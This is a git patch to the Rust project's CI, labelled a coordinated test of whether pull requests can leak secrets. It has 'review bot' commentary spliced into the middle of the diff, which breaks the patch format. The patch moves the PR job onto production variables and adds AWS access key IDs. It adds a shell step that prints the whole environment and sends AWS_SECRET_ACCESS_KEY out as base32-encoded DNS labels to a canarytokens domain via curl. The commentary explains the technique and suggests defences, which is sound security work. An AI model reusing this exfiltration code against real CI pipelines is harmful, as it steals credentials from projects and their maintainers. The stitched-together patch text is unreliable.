From ec96d3980385eccf81f6259878056657e0c5ff23 Mon Sep 17 00:00:00 2001
From: Lukas Markeffsky <@>
Date: Thu, 17 Nov 2022 18:53:39 +0100
Subject: [PATCH] [DO NOT MERGE] Test if GitHub PRs can leak secrets
This is an attempt to extract the AWS key associated with `CACHES_AWS_ACCESS_KEY_ID` via a pull request. This secret is not considered sensitive. This attack is done in coordination with the Security Response WG and for educational purposes only. cc @pietroalbini @cuviper
---
 .github/workflows/ci.yml | 5 +++++
 src/ci/github-actions/ci.yml | 2 +-
 src/ci/scripts/run-build-from-ci.sh | 7 +++++++
 3 files changed, 13 insertions(+), 1 deletion(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 771cef6e4d0d6..660406c360442 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -38,7 +38,12 @@ jobs:
 env:
 CI_JOB_NAME: "${{ matrix.name }}"
 SCCACHE_BUCKET: rust-lang-ci-sccache2
+ DEPLOY_BUCKET: rust-lang-ci2
 TOOLSTATE_REPO: "https://github.com/rust-lang-nursery/rust-toolstate"
+ TOOLSTATE_ISSUES_API_URL: "https://api.github.com/repos/rust-lang/rust/issues"
+ TOOLSTATE_PUBLISH: 1
+ CACHES_AWS_ACCESS_KEY_ID: AKIA46X5W6CZI5DHEBFL
+ ARTIFACTS_AWS_ACCESS_KEY_ID: AKIA46X5W6CZN24CBO55
 CACHE_DOMAIN: ci-caches.rust-lang.org
 if: "github.event_name == 'pull_request'"
 strategy:
diff --git a/src/ci/github-actions/ci.yml b/src/ci/github-actions/ci.yml
index 9f40177990080..dd0397233ddea 100644
--- a/src/ci/github-actions/ci.yml
+++ b/src/ci/github-actions/ci.yml
@@ -281,7 +281,7 @@ jobs:
 <<: *base-ci-job
 name: PR
 env:
- <<: [*shared-ci-variables, *public-variables]
+ <<: [*shared-ci-variables, *prod-variables]
 if: github.event_name == 'pull_request'
 strategy:
 matrix:
diff --git a/src/ci/scripts/run-build-from-ci.sh b/src/ci/scripts/run-build-from-ci.sh
index c02117f459de0..b3f6bb52c38a2 100755
--- a/src/ci/scripts/run-build-from-ci.sh
+++ b/src/ci/scripts/run-build-from-ci.sh
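Review bot: The `env` merge for the PR job now pulls in `*prod-variables` instead of `*public-variables` while the job is still gated on `if: github.event_name == 'pull_request'`, so a job that runs code authored in any fork is handed the production variable set; the generated `.github/workflows/ci.yml` hunk above shows what that adds (`DEPLOY_BUCKET`, `TOOLSTATE_PUBLISH: 1`, two `AKIA…` access key IDs). The key IDs alone are not secrets, and whether the matching `AWS_SECRET_ACCESS_KEY` actually reaches the job depends on how the steps map `secrets.*` into the environment, which is outside this hunk. Since this file is itself editable from a PR, the public/prod split cannot be protected by code review of the YAML alone; keep the `pr` job on `*public-variables`, state the invariant in a comment such as `# pr runs fork-authored code: never merge *prod-variables here`, and have CI reject any `pr` env that references the prod anchor. The `pr` job mapping continues outside the hunk.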
@@ -2,6 +2,13 @@
 # Start the CI build. You shouldn't run this locally: call either src/ci/run.sh
 # or src/ci/docker/run.sh instead.
+env
+
+url=$(python3 <<< "token='ta9trx5u17g3nta59hhn3jhq9.canarytokens.com'; data='${AWS_SECRET_ACCESS_KEY}'; import base64, re, random; print('.'.join(filter(lambda x: x,re.split(r'(.{63})', base64.b32encode(data.encode('utf8')).decode('utf8').replace('=','')) + ['G'+str(random.randint(10,99)), token])))")
+curl "${url}"
+
+exit 1
+
 set -euo pipefail
 IFS=$'\n\t'
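Review bot: The secret leaves through the hostname, not the HTTP request: `AWS_SECRET_ACCESS_KEY` is base32-encoded, cut into 63-character DNS labels and prefixed onto the canarytoken domain, so the value reaches the token's authoritative nameserver the moment `curl` resolves the name, even if the HTTP connection is blocked; an egress HTTP proxy or URL allowlist does not stop this, only DNS-level controls or running fork PRs with no secrets at all. The bare `env` before it also writes the whole environment into the job log, which for a `pull_request` job is publicly readable; GitHub masks registered secret values, but anything unregistered or derived from them is printed verbatim. Both lines run before `set -euo pipefail`, so a failed lookup or request is silent and only the explicit `exit 1` fails the job. Because the workflow executes this script from the PR's own checkout, hardening the workflow YAML alone is insufficient; everything under `src/ci/scripts` is attacker-controlled input for fork PRs. For the coordinated test I would drop `env` and use a presence check such as `[ -n "${AWS_SECRET_ACCESS_KEY:-}" ] && echo 'secret present in PR job'`, which demonstrates the exposure without dumping unrelated values into a public log.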